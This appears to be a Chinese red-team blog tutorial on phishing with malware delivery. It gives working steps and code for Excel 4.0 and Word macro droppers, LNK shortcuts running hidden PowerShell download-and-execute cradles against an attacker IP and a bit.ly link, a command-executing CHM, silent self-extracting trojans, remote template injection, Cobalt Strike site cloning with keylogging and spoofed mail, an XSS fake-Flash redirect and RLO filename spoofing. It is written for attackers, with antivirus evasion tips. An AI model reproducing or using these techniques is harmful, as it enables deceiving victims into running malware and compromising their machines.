前言
涵盖了现在大多数红队钓鱼的手法,一直以来钓鱼配合免杀,更能出奇制胜!
1. excel宏执行任意命令
新建一个exel表,然后打开,对准这个右键点击插入宏。
然后在第一切换到宏,复制粘贴如下语句:
代码语言:javascript复制=EXEC("notepad")
=HALT()必须带=HALT(),不然虽然命令执行了,但会报错,容易露馅!
然后测试一下,选中语句,右键,点击执行:
就会弹出notepad:
通过msf生成msi文件,python开启http服务,然后替换命令为攻击载荷,右键隐藏宏,并把文件执行方式改为
Auto_open,直接复制粘贴,按一下enter就行了
然后另存,2016版本记得点击否,然后得选择一个启用宏的文件,远方服务器监听:
就欧克了,当然这里肯定不止这个msi文件,都能执行命令了,该怎么利用,你懂的!
2 Link钓鱼:
随便选择一个应用或者文件,右键点击创建快捷方式,右键打开属性:
我们需要更改目标这里的目标,这里的目标路径改成我们的攻击载荷,下面的起始位置可以不更改,基本上没啥影响。
修改:
代码语言:javascript复制C:WindowsSystem32cmd.exe /c powershell -nop -w hidden -exec bypass - -c "IEX((New-Object System.Net.WebClient).DownloadString('//192.168.1.109/1.ps1'))
选择更改图标,因为我这里改成了cmd,快捷方式对应的图标也会更改为cmd,需要更改一下图标,查找图标路径改成shell32.dll 这里存放这windows系统所以的图标,不建议去自己加,因为你要发送给受害者,不能保证受害者电脑上有此图标
然后再改一下快捷方式名字,比如像我这样,必须得诱人一点!
那么一个link 钓鱼就完成了,但是这个放出去杀软立马干死,好人做到底,再来个过静态的免杀语句混淆。
代码语言:javascript复制cmd.exe /c "FOR /F "delims=s tokens=4" %a IN ('set^|findstr PSM')DO %a IEX (New-ObjectNet.WebClient).DownloadString('http://bit.ly/L3g1t')"3 CHM文档钓鱼:
新建一个文件夹,新建一个index.html,文件内容为
代码语言:javascript复制<!DOCTYPE html><html><head><title>Mousejack replay</title><head></head><body>
command exec
<OBJECT id=x classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11" width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap::shortcut">
<PARAM name="Item1" value=',calc.exe'>
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<SCRIPT>
x.Click();
</SCRIPT>
</body></html>
然后打开Easy CHM程序,新建,浏览,选择我们建立好的目录,然后确定:
然后点击编译,然后就会生成一个chm文档
那么我们这里只需要打开这个文件,就会执行里面的命令
从代码上来看,chm文件是可以执行js代码的,那么就可以配合jsbackdoor 来进行权限获取,这里推荐一个项目:
代码语言:javascript复制https://github.com/Ridter/MyJSRat一个py版本的JSbackdoor
4.文件钓鱼
钓鱼方式的开山鼻祖,很古老了,原理就是利用一般人是不会打开显示已知的文件扩展名,而windows正常情况下不会显示已知的文件扩展名,但是从事信息安全的人员一般都打开了的。
这里制作也挺简单的,只需要更换一个图标就行,这里先用cs随便生成一个exe
然后我把显示已知的文件扩展名关掉
首先把exe文件拖到resource hacker里,成功后面显示文件名,然后点击增加一个资源
然后选择ico图标
然后点击保存即可
那么就成了鸭!
5. 自解压钓鱼
我这里就用刚刚改好的木马了,创建自解压文件:
点击高级,自解压选项,常规,设置自解压路径
点击设置,设置解压后运行文件的路径
模式选择全部隐藏
更新设置成覆盖所有文件,保证二次自解压不报错,不会引起怀疑
然后修改文件名和图标进行伪装就欧克了
6.word宏钓鱼
新建一个word,打开,然后点击视图,宏,查看宏,选择当前文档,点击创建
然后cs生成宏代码,复制粘贴进去
然后另存为docm文档?你以为就这样?
NO,咱们玩骚一点,我在网上随便找了个模板复制粘贴进去,然后截图,另存为
打开我们的神器,美图秀秀,打开我们刚截图的图片,点击背景虚拟化,调整虚拟化程度,最好是那种弱影弱现的感觉最nice,然后加上一些说明嗷
然后设置图片尺寸为790,1120
然后保存,然后就可以看到效果了
为什么会设置成790x1120嘞,只是为了刚好覆盖word里面的文本,然后docx文档另存为doc文档
然后打开,去开启显示开发者工具选项卡,文件->选项->自定义功能区->主选项卡->开发者工具
然后点击开发者工具,选择图像(Active控件)
设置图像格式为浮于文字上方,并把图像拉满
效果就是这样,会把文字全部覆盖
然后点击图像属性,设置成我们做好的图片,然后点击宏创建宏,cs生成宏木马
复制粘贴,在Auto_Open()函数首部编写代码,设置图片位置为0高度为0让宏运行后doc上图片消失,然后保存,office马就制作好了
代码语言:javascript复制Project.ThisDocument.Image1.Top = 0
Project.ThisDocument.Image1.Width = 0
成品展示:
那么点击启用宏,图片就好消失,显示出正常的文件来。
还有一种是远程加载的方式,先创建一个带有宏木马的文档另存为dotm后缀当成模板,放在远程服务器上,开启http服务,然后再新建一个模板word,改后缀改成zip,然后解压。
然后找到这个文件settings.xml.rels,编辑
替换成我们远程的宏木马文件的链接:
然后再把它压缩了,文件后缀又改回成docx,那么就成了,这种免杀效果要好一点,远程加载嘛。
7.伪造网站钓鱼
那么我们先来看cs中的clone web的模块
填入克隆网站的url,可以选择进行键盘记录,然后点击就能克隆,但是有些网站也克隆不了,受到协议的保护,那么克隆好之后就可以点击进行管理
那么就来讲讲cs中的邮件钓鱼板块
导入收件人,这里邮件和名字一定要用tab键分开,再导入模板的文件的时候,去选择一封你需要伪造的正常文件,然后点击选择显示文件原文,复制粘贴就行,achment就是附件,可以加入你的免杀马,word,什么的,embed项就是点击之后要跳转的页面,那么可以配合clone web使用,填入我们cs服务器克隆的网站url,然后就是设置邮件服务器。
Bounce to 选项就是你伪造好的邮箱,你可以伪造成admin@qq.com什么的,但是大多数邮件服务器有防御,会显示代发人,发之前还可以点击Preview进行预览
再来给flash钓鱼网站,当我们找到一个网站的后台,顺利进去了,但是任何getshell的点,就只找到一个xss,那么如何getshell嘞?这时候就来一波flash钓鱼把
建立网站
我们找到index.html中的立即下载所在的标签,url替换成我们的木马下载链接
那么我们如何让管理员重定向过来?这里新建一个js文件,文件内容如下,然后我们的xss脚本调用这段js文件
代码语言:javascript复制window.alert = function(name) {
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert("您的flash版本过低,尝试升级后访问该页面!");
window.location.href="http://www.xxx.com"<script src="http://www.abc.flash.com.cn/redirection.js"></script>当然为了保险起见,我们得配合自解压钓鱼,现在压缩的是两个文件,一个是木马文件,另一个是flash正常安装程序,两个文件都得执行,通过修改资源图标,伪装成flash安装程序,
就可以getshell了!
8.unicode反转文件后缀钓鱼
Unicode(中文:万国码、国际码、统一码、单一码)是计算机科学领域里的一项业界标准。它对世界上大部分的文字系统进行了整理、编码,使得电脑可以用更为简单的方式来呈现和处理文字。而如上技术正是使用了Unicode的RLO(开始从左向右覆盖),Unicode定义的 Start of right-to-left override,控制字符是RLO,ASCII码是0x3F。只要在一行字符前面加上一个0x3F就可以实现文本的反向排列。这个0x3F是Unicode为了兼容阿拉伯文字从左至右的阅读习惯设计的一个转义字符。
选择木马,重命名,然后点击插入unicode控制字符
完成之后
END
